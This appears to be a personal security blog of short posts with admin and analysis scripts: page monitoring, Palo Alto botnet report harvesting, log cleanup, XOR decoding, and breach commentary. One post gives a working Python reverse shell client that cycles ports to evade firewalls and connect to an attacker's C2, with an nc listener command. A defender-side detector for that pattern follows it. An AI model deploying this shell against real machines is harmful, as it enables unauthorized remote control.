Thursday, May 31, 2018

Simple Script To Monitor Web Page For Changes

#!/bin/bash
#***********************************************
#* Author: mmyrick
#* Date Created: 20180531
#* Purpose: Monitor a website for signs of change
#* Environment: Works from OSX v10.13.4
#************************************************

##THIS MUST BE SET MANUALLY
#Download Page, Hash Page, and Assign Original MD5
curr=f9a38facacc54241e4028bd2d2108a8b

#BEGIN ENDLESS LOOP
while true; do

#Download webpage
/usr/bin/curl -s -o /tmp/blah.txt www.purple.com

#Sleep for 5 seconds so page can download
/bin/sleep 5

#Hash the page (md5 prints "MD5 (/tmp/blah.txt) = <hash>", so the hash is field 4)
new=$(/sbin/md5 /tmp/blah.txt 2>/dev/null | cut -f4 -d " ")
#/bin/echo $new

#Compare the two MD5 values
if [[ -z "$new" ]]
then
 #AN EMPTY HASH MEANS THE DOWNLOAD FAILED; DON'T REPORT THAT AS A CHANGE
 /bin/echo "DOWNLOAD FAILED, WILL RETRY"
elif [[ "$new" != "$curr" ]]
then
 #PRINT ONLY IF Something Has Changed
 /bin/echo "THE WEBPAGE HAS CHANGED"
 /bin/echo "THE WEBPAGE HAS CHANGED"
 /bin/echo "THE WEBPAGE HAS CHANGED"
 /bin/echo "THE WEBPAGE HAS CHANGED"
 /bin/echo "THE WEBPAGE HAS CHANGED"
fi

#Remove temp files (-f so a failed download doesn't produce an error here)
/bin/rm -f /tmp/blah.txt

#Get WebPage Once Every 5 Min
/bin/sleep 300

#Run Again
done

Saturday, January 13, 2018

Simple Python HTTP Server

There are times when you'll need a simple way to transfer a file. The Python one-liner below starts a web server that serves whatever directory you run it from:

Python V2:
python -m SimpleHTTPServer 8080

Python V3:
python3 -m http.server 8080

Friday, January 12, 2018

Simple Python Reverse Shell Client

You never know when you'll need persistent control of a remote machine. The script below can typically be used in conjunction with a C2 server you control running the following: nc -nv -l -p 21
(from nc -h: -n = don't resolve hostnames, -v = verbose, -l = listen, -p = port)

Print statements have been commented out below for your convenience. 

#!/usr/bin/env python -tt
#PYTHON 2 SCRIPT (print statements, str-based sockets)

#NECESSARY LIBS
import socket
import time
import subprocess

##BEGIN CONNECTION ROUTINE
#print "Starting Connection ..."
mysocket = socket.socket()
connected = False

##ATTEMPT TO CONNECT TO C2 SERVER
while not connected:
    #FOR ATTEMPTING TO EVADE FIREWALL, REDUCE PORTS AS NECESSARY
    for port in [21, 22, 80, 443]:
        time.sleep(2)
        try:
            #print "Attempting Port:", port

            ##CHANGE IP BELOW TO YOUR C2 SERVER
            mysocket.connect(("127.0.0.1", port))
        except socket.error:
            #print "Not Able To Connect"
            continue
        else:
            #print "Connection Successful"
            connected = True
            break

##WE ARE NOW CONNECTED
while True:
    commandrequested = mysocket.recv(1024)
    prochandle = subprocess.Popen(commandrequested, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    ##ALLOW PROGRAM TO SAFELY WAIT FOR ABOVE PROCESS TO COMPLETE
    prochandle.wait()
    results = prochandle.stdout.read() + prochandle.stderr.read()
    mysocket.send(results)

Known Limitations:
1) send/recv have transfer limitations (~12k)
2) "cd" appears (it actually does) NOT to work, as EACH command spawns a new shell
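From the defender's side, the connect loop above has a recognisable shape on the wire: one client walks 21, 22, 80 and 443 in that order, two seconds apart, until one of them answers. The following is an added example (not part of the post) that flags that sequence in connection logs; the log format and sample lines are constructed for the illustration, and the 30-second window is my assumption.

```python
"""Added example, not part of the original post: a defender-side detector for
the port-cycling connect pattern the client above exhibits (21, 22, 80, 443
tried in order, ~2 s apart, repeating until one succeeds).  The log format and
the sample lines are constructed for this illustration."""
from collections import defaultdict
from datetime import datetime, timedelta

CYCLE_PORTS = (21, 22, 80, 443)     # the order the client walks through
WINDOW = timedelta(seconds=30)      # assumed: one full cycle at 2 s/attempt is ~8 s

def parse_line(line):
    """Parse 'ISO-time src=IP dst=IP dport=N status=refused|ok' into a dict."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.fromisoformat(ts)
    rec["dport"] = int(rec["dport"])
    return rec

def find_port_cyclers(lines):
    """Return {(src, dst): first_ts} for pairs that walk CYCLE_PORTS in order
    within WINDOW.  A single refused connection is noise; the ordered sweep
    across unrelated service ports from one client is the signal."""
    attempts = defaultdict(list)
    for rec in map(parse_line, lines):
        attempts[(rec["src"], rec["dst"])].append((rec["ts"], rec["dport"]))
    hits = {}
    for pair, events in attempts.items():
        events.sort()
        for i in range(len(events) - len(CYCLE_PORTS) + 1):
            run = events[i:i + len(CYCLE_PORTS)]
            ports = tuple(p for _, p in run)
            span = run[-1][0] - run[0][0]
            if ports == CYCLE_PORTS and span <= WINDOW:
                hits[pair] = run[0][0]
                break
    return hits

# Constructed sample: 10.0.0.5 beacons to 203.0.113.7 the way the client does;
# 10.0.0.9 makes one ordinary HTTPS connection and must not be flagged.
SAMPLE_LOG = [
    "2018-01-12T10:00:00 src=10.0.0.5 dst=203.0.113.7 dport=21 status=refused",
    "2018-01-12T10:00:02 src=10.0.0.5 dst=203.0.113.7 dport=22 status=refused",
    "2018-01-12T10:00:04 src=10.0.0.5 dst=203.0.113.7 dport=80 status=refused",
    "2018-01-12T10:00:06 src=10.0.0.5 dst=203.0.113.7 dport=443 status=refused",
    "2018-01-12T10:00:01 src=10.0.0.9 dst=203.0.113.7 dport=443 status=ok",
]

if __name__ == "__main__":
    for (src, dst), first in find_port_cyclers(SAMPLE_LOG).items():
        print(f"{src} -> {dst}: ordered sweep of {CYCLE_PORTS} starting {first}")
```

A host that only ever sees one of the four ports, or sees them out of order, is not flagged; the detector keys on the sequence, not on refused connections alone.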

Friday, September 19, 2014

Harvesting Actionable Security Intelligence From Palo Alto Networks Botnet Report


Buried deep within the Palo Alto Networks firewall is a mini correlation engine that normally doesn't seem to get much attention. This correlation engine produces a daily "botnet report" (monitoring->botnet report) listing machines exhibiting strange behavior (HTTP connections to an IP instead of a domain, downloading executable content, connecting to domains categorized as malware, connecting to a newly registered domain, etc.). The best part is that there is also a risk score (1 = lowest, 4 = highest), so if you don't want to wade through (potentially) hundreds of alerts, you can focus on just the highest. In my environment, I like to focus on anything 3 or above. Over the years, this report has been so useful that we've actually integrated it into our SOC workflow by leveraging the PAN API.

If you're looking to leverage every last bit of your security investment in your Palo Alto Networks firewall, you will be pleasantly surprised by the botnet report. The bash script below will automatically harvest the highest-confidence alerts and email them to an address of your choice for further analysis. Enjoy.

#!/bin/bash
########################################################################################
# Author: Matthew Myrick
# Date Created: 20131007
# Date Modified: 20131020
# Purpose: This script will pull the botnet information from ALL Pans and create
#          trac tickets for anything with a confidence of more than 2.
# Usage: ./pan_botnet_trac.sh
#
# Dependencies:
#   API keys and PAN IP's must be current/accurate.
#########################################################################################

#SINCE ONLY NEWER VERSIONS OF BASH SUPPORT ASSOCIATIVE ARRAYS, I OPTED NOT TO USE THEM...FOR PORTABILITY REASONS

#DEFINE PALO ALTO FIREWALLS:
ASH="10.xx.xx.xx"
BNE="10.xx.xx.xx"

#DEFINE PALO ALTO FIREWALL KEYS:
ASHkey="enterkey"
BNEkey="enterkey"

#PUT ALL FIREWALLS IN AN ARRAY SO WE CAN ITERATE!
BOXES=( $ASH $BNE )
KEYS=( $ASHkey $BNEkey )

#SETUP DESCRIPTION FOR HEADER:
DATE=`/bin/date --date=yesterday +"%Y%m%d"`
DESC="PALO_ALTO_BOTNET_REPORT-"$DATE
#echo $DESC

#LOOP THROUGH PANS:
#GET THE SIZE OF THE ARRAY
TOTAL=${#BOXES[*]}

#ITERATE THROUGH FIREWALLS, COLLECTING REPORTS AND CHECKING FOR CONFIDENCE > 2
#NOTE: -k SKIPS CERTIFICATE VERIFICATION AND THE API KEY TRAVELS IN THE QUERY STRING,
#SO ONLY RUN THIS FROM A HOST YOU TRUST ON A PATH YOU TRUST TO THE FIREWALLS
for (( i=0; i<=$(( $TOTAL -1 )); i++ ))
do
 #echo "Connecting to ${BOXES[$i]} "
 /usr/bin/curl -s -k "https://${BOXES[$i]}/api/?type=report&reporttype=predefined&reportname=botnet&key=${KEYS[$i]}" | awk -F '[<>]' '{if ($3 > 2) print $3,$7,$11,$19,$23}' >> /tmp/pan_botnet.txt

 #####TO SEE FULL OUTPUT UNCOMMENT THE LINE BELOW
 #/usr/bin/curl -s -k "https://${BOXES[$i]}/api/?type=report&reporttype=predefined&reportname=botnet&key=${KEYS[$i]}"
 #TEST="/usr/bin/curl -s -k https://${BOXES[$i]}/api/?type=report&reporttype=predefined&reportname=botnet&key=${KEYS[$i]}"
 #echo $TEST
done

#PRINT/EMAIL TEMP FILE ONLY IF THERE IS DATA
#/bin/cat /tmp/pan_botnet.txt
if [ -s /tmp/pan_botnet.txt ]; then
 #ADD HEADER TO FILE
 /bin/sed -i '1iConfidence(4=Highest) Source Reason:' /tmp/pan_botnet.txt
 /bin/sed -i "1i$DESC" /tmp/pan_botnet.txt
 #EMAIL FILE TO TRAC
 /bin/mail -s "Palo Alto Daily Botnet Report" blah@stuff.com < /tmp/pan_botnet.txt
fi

#REMOVE THE TEMP FILE
/bin/rm -f /tmp/pan_botnet.txt

Wednesday, November 20, 2013

Google's tool for analyzing email headers

I periodically have the need to dig through email headers to figure out when the email originated.  Email headers aren't rocket science (essentially a LIFO stack), but they make my eyes wiggle.  Today, I stumbled across Google's tool for deciphering these logs...and it's pretty cool.

https://toolbox.googleapps.com/apps/messageheader/analyzeheader

This tool takes a header like this:
Delivered-To: f00bar@gmail.com
Received: by 10.182.148.167 with SMTP id tt7csp107427obb;
        Wed, 20 Nov 2013 14:09:06 -0800 (PST)
X-Received: by 10.15.81.129 with SMTP id x1mr49625eey.55.1384985344849;
        Wed, 20 Nov 2013 14:09:04 -0800 (PST)
Return-Path: <noreply@malwr.com>
Received: from malwr.com ([46.244.22.3])
        by mx.google.com with ESMTP id w6si12230921eeg.336.2013.11.20.14.09.04
        for <f00bar@gmail.com>;
        Wed, 20 Nov 2013 14:09:04 -0800 (PST)
Received-SPF: neutral (google.com: 46.244.22.3 is neither permitted nor denied by best guess record for domain of noreply@malwr.com) client-ip=46.244.22.3;
Authentication-Results: mx.google.com;
       spf=neutral (google.com: 46.244.22.3 is neither permitted nor denied by best guess record for domain of noreply@malwr.com) smtp.mail=noreply@malwr.com
Received: from cuckoo.shadowserver.org (localhost [127.0.0.1])
        by malwr.com (Postfix) with ESMTP id EC56417818CD
        for <f00bar@gmail.com>; Wed, 20 Nov 2013 14:09:02 -0800 (PST)
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Subject: Malwr - Analysis completed!
From: noreply@malwr.com
To: f00bar@gmail.com
Date: Wed, 20 Nov 2013 22:09:02 -0000
Message-ID: <20131120220902.24101.27746@cuckoo.shadowserver.org>


And makes it easier to look at, like this:
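
What the tool is doing under the hood, as an added example that is not part of the post or of Google's tool: parse the Received: lines of the header above (trimmed to the lines the walk needs), reverse them so the origin comes first, and compute the delay at each hop. The from/by extraction is a simple regular expression I chose; it fits the lines shown here, not every Received: syntax seen in the wild.

```python
"""Added example, not part of the post or Google's tool: walk the Received:
chain of the header above (trimmed to the lines the walk needs), oldest hop
first, and compute the delay at each hop.  The from/by extraction is a simple
regex I chose; it fits the lines shown here, not every Received: syntax."""
import re
from email import message_from_string
from email.utils import parsedate_to_datetime

HEADERS = """\
Delivered-To: f00bar@gmail.com
Received: by 10.182.148.167 with SMTP id tt7csp107427obb;
        Wed, 20 Nov 2013 14:09:06 -0800 (PST)
Received: from malwr.com ([46.244.22.3])
        by mx.google.com with ESMTP id w6si12230921eeg.336.2013.11.20.14.09.04
        for <f00bar@gmail.com>;
        Wed, 20 Nov 2013 14:09:04 -0800 (PST)
Received: from cuckoo.shadowserver.org (localhost [127.0.0.1])
        by malwr.com (Postfix) with ESMTP id EC56417818CD
        for <f00bar@gmail.com>; Wed, 20 Nov 2013 14:09:02 -0800 (PST)
Date: Wed, 20 Nov 2013 22:09:02 -0000

"""

def received_hops(raw_headers):
    """Return hops oldest-first: who handed off ('from'), who stamped it ('by'),
    the stamp time and seconds since the previous hop.  Each relay prepends its
    own Received: line, so the bottom one is the origin and only the top ones,
    written by your own MX, are under your control (the rest can be forged)."""
    msg = message_from_string(raw_headers)
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        value = " ".join(value.split())            # unfold the header
        clause, _, stamp = value.rpartition(";")   # timestamp follows the last ';'
        frm = re.search(r"\bfrom\s+(\S+)", clause)
        by = re.search(r"\bby\s+(\S+)", clause)
        hops.append({"from": frm.group(1) if frm else None,
                     "by": by.group(1) if by else None,
                     "time": parsedate_to_datetime(stamp.strip())})
    for prev, cur in zip([None] + hops, hops):
        cur["delay_s"] = 0 if prev is None else int((cur["time"] - prev["time"]).total_seconds())
    return hops

if __name__ == "__main__":
    for h in received_hops(HEADERS):
        print(f"{h['time']:%H:%M:%S %z} +{h['delay_s']}s {h['from'] or '-'} -> {h['by']}")
```

For this header the walk gives three hops two seconds apart, from malwr.com's own Postfix up to the Gmail host; a large jump in delay, or a "by" host that doesn't match the next hop's "from", is what you look for when a header has been tampered with.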


Thursday, November 14, 2013

Making Sure Logs Don't Get Out of Control


Sometimes, you need a little script to make sure your logs aren't getting too crazy. Enjoy!

#! /bin/bash

###################################################################
#
# Author: Matthew Myrick
# Date Created: 20120330
# Date Modified: 20120330
# Purpose: This scripts is used to remove old data when the
#       disk is over 97% full
#
# Dependencies: CRON
#
####################################################################

#CHECK TO SEE DISK USE PERCENTAGE
perc="`df -h /Promise | tail --lines 1 | awk '{print $5}' | cut -d '%' -f 1`"

#COMPARE VALUE TO OUR LIMIT
if [ "$perc" -gt "97" ]; then
 #DELETE THE OLDEST TOP-LEVEL DIRECTORY; -mindepth 1 KEEPS /Promise ITSELF OUT OF THE CANDIDATE LIST
 /usr/bin/find /Promise -mindepth 1 -maxdepth 1 -type d -printf "%T@ %p \n" | sort -n -k 1,1 | awk '{print $2}' | head -1 | xargs rm -rf
fi

Wednesday, October 30, 2013

FireEye Script To Manage YARA Across An Enterprise



FireEye has been a huge help to cyber security analysts over the years. However, nothing is perfect...and the lack of an API is a huge shortcoming (which I hear they are working on). To compensate for this shortcoming, I've written a bash script that will distribute a file of properly formatted Yara rules (you can also do the same thing for Snort rules) to FireEye devices (even with their latest enforcement of the rails authenticity token). Enjoy!


Monday, October 28, 2013

XOR From the Unix CLI


Every once in a while (depending upon how hard you look) I'm faced with something that looks like an executable, but not quite. A very common tactic used by cyber criminals to evade IDS and analysts is to XOR executables (and sometimes data) so that they don't look suspicious. There is no shortage of ways to XOR, but I thought I'd share an easy method using perl, borrowed from Daniel Wesemann (https://isc.sans.edu/forums/diary/Exploit+cocktail+Struts+Java+Windows+going+after+3-month+old+vulnerabilities/16913).

In the example below he uses "cat" and "perl" to perform a single-byte XOR (0x77) on a file called "data.hex" and then redirects that to a file called "data.exe".

cat data.hex | perl -pe 's/(..)/chr(hex($1)^0x77)/ge' > data.exe
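
The same single-byte XOR in Python, as an added example that is not from the post or the ISC diary, plus the step that usually comes first for an analyst: recovering the key when it is not known to be 0x77. The input is a constructed hex dump of a fake DOS header, and the function names are mine.

```python
"""Added example (not the post's Perl one-liner): the same single-byte XOR over
a hex dump, plus recovery of an unknown key by looking for a known file magic.
The sample input is constructed here by XOR-ing a fake DOS header with 0x77."""
import binascii

def xor_hex(hex_text, key):
    """Equivalent of perl -pe 's/(..)/chr(hex($1)^key)/ge' on a hex dump:
    every pair of hex digits becomes one byte, XOR-ed with the single-byte key."""
    raw = binascii.unhexlify("".join(hex_text.split()))   # ignore whitespace/newlines
    return bytes(b ^ key for b in raw)

def recover_single_byte_key(data, magic=b"MZ"):
    """Try all 256 keys and return those under which `data` starts with `magic`.
    Generalises the fixed 0x77 in the post to an unknown key; for non-PE payloads
    pass another magic (b"%PDF", b"PK", ...).  XOR is bijective per position, so
    at most one key can match a given first byte."""
    n = len(magic)
    return [k for k in range(256) if bytes(b ^ k for b in data[:n]) == magic]

# Constructed sample, standing in for data.hex: "MZ", a little header padding and
# the classic DOS stub message, XOR-ed with 0x77 and written out as hex.
PLAIN = b"MZ\x90\x00\x03\x00\x00\x00This program cannot be run in DOS mode."
DATA_HEX = binascii.hexlify(bytes(b ^ 0x77 for b in PLAIN)).decode()

if __name__ == "__main__":
    keys = recover_single_byte_key(binascii.unhexlify(DATA_HEX))
    print("candidate keys:", [hex(k) for k in keys])
    print(xor_hex(DATA_HEX, keys[0]))
```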

Wednesday, January 16, 2013

The Basics of Linux Screen


Screen is an awesome utility that offers the ability to detach a long running process (or program, shell-script, irc window, etc.) from a session and then attach it back at a later time.  Below are the basics:

To get started, enter:
      screen

To see your existing screen sessions, enter:
      screen -list

To detach an attached screen, enter:
      screen -D

To re-attach to a detached screen, enter:
      screen -r

Monday, January 14, 2013

Java 0day is upon us and no patch in Sight!

And... the Java 0day is here. Actually, I am way late. So late that there is a patch. But careful, it's not really a patch. It's just a configuration setting :p So no matter what you do, I encourage you to think about this one very, very seriously.

Monday, November 19, 2012

Simply Adding To The GIT Repo

 

Seems I'm always forgetting the git syntax for checking things into the repo...simply follow the steps below and you should be alright.

# before you make changes to your local git dir..
git pull        # to get you in sync with the main repo
# write your file to the local git directory where you want it
git status      # this will give you an idea of the changes
git add path/to/new/file
git commit -m "some witty comment here"
git push

 

Thursday, December 8, 2011

Analyzing Flash Files


A friend told me about this, so I thought I'd share....

xxxswf.py is a Python script for carving, scanning, compressing, decompressing and analyzing Flash SWF files. The script can be used on an individual SWF, single or multiple SWFs embedded in a file stream, or all files in a directory. The tool could be useful for system administrators, incident responders, exploit analysts, malware analysts or web developers.

http://hooked-on-mnemonics.blogspot.com/2011/12/xxxswfpy.html

Tuesday, August 9, 2011

Australian DSD Strategies to Mitigate Targeted Attacks

The annual Blackhat/Defcon cyber security conferences took place last week in Las Vegas, NV. There were more vendors than ever, however the underlying theme of the conference remained the same...understanding/defending/preventing targeted cyber intrusions (a.k.a. APT).

Vendors certainly have their place in the fight to protect your information, but it is important to understand that there is no silver bullet. Below you will find a very informative (arguably conclusive) list of mitigations (most of which don't require additional hardware/software) to defend against targeted cyber intrusions.

Australian DSD Strategies to Mitigate Targeted Attacks
 

Wednesday, July 6, 2011

Linux Password Protect Zips


Those of us who work around malware often need to password protect malware specimens within a zip archive in order to avoid accidental infection and/or antivirus quarantine. I can never remember the syntax for doing this from the Linux command line and it always seems hard to find via Google, so I thought I would document it here.

To Zip: zip -P <password> -r <output.zip> <input file(s)>

To Unzip: unzip <output.zip>

Wednesday, June 1, 2011

Northrop Grumman...Another one bites the dust!

A Northrop Grumman E-2C Hawkeye 2000 surveillance and reconnaissance plane lands on a carrier.

In a story recently released by Fox (http://www.foxnews.com/scitech/2011/05/31/northrop-grumman-hit-cyber-attack-source-says/) we see that Northrop Grumman was also compromised via remote access. We can chalk this up to yet another compromise as a result of the intrusion at RSA where the secret sauce was stolen. I wonder if any of these companies are going to go after EMC/RSA for damages?

The article is fairly vague (surprise), but it looks as though the "bad guys" were able to get in. That is unless somebody just accidentally tripped over the cable for the remote access network.

Saturday, May 28, 2011

Hackers breached U.S. defense contractors (Reuters)

(Reuters) - "Unknown hackers have broken into the security networks of Lockheed Martin Corp (LMT.N) and several other U.S. military contractors, a source with direct knowledge of the attacks told Reuters. "

"They breached security systems designed to keep out intruders by creating duplicates to "SecurID" electronic keys from EMC Corp's (EMC.N) RSA security division, said the person who was not authorized to publicly discuss the matter." Reuters

Here's another link to a similar story from the Taipei Times


Monday, May 23, 2011

Remove Character From Bash Variable


Sometimes, it is the little things that take an extra few minutes to find on the Internet that really slow you down...

Remove the first character from a bash variable:
VAR=${VAR#?}

Remove the last character from a bash variable
VAR=${VAR%?}

Friday, May 20, 2011

Rename Perl script on the Mac



I love Linux and BSD. I also love my Mac. I really like the user interface, and the underlying BSD roots. (Insert generic Mac fan-pitch)

There are a few things which drive me NUTS about the BSD underpinnings of the Mac, though. MacPorts is a great step in the direction of bringing better Linux/BSD programs onto the Mac platform, but it doesn't always have everything you need (and it's pretty slow). The most recent annoyance is the lack of the 'rename' Linux command, my favorite version of which enables me to bulk rename files based on a regular expression. Yes, I could hack together an awk or bash script to do this each time, but (like Matt), I like simpler == better.

So, when I ran into this issue yesterday, I decided I had enough. It turns out that the rename Linux command that I like (based on regular expressions, not the more simplistic syntax shipped with Redhat) is just a perl script.

So, I found the script on one of my Ubuntu servers (prename), slapped it into /usr/local/bin, and away I went. Much easier than some other custom compiling Mac solutions.

Wednesday, May 18, 2011

Android and the long-lived authToken



I was very disappointed to hear about Android sending long-lived (~2 weeks) auth tokens in the clear for Google services...very similar to the Facebook/Firesheep issue. There are a few writeups, but the research was originally done by Ulm University (http://www.uni-ulm.de/en/in/mi/staff/koenings/catching-authtokens.html).

This specific vulnerability is addressable by server-side changes to enforce SSL when exchanging the tokens. I'm glad to hear that Google is moving forward on fixing this side of things. People are also saying it's only exploitable via WiFi, but I wouldn't be surprised to hear some type of 3G snooping as well.

BUT, this brings up a major concern: the operating system versions for Android are so fractured, and ultimately are controlled by the wireless providers. Even though the latest version of Android doesn't exhibit this behavior, the mobile phone companies continue to drag their feet pushing the updates. This is akin to vendors that only support IE6...they drag their feet because they can. I think larger customers need to push back and demand prompt patching (or the ability to self-update!)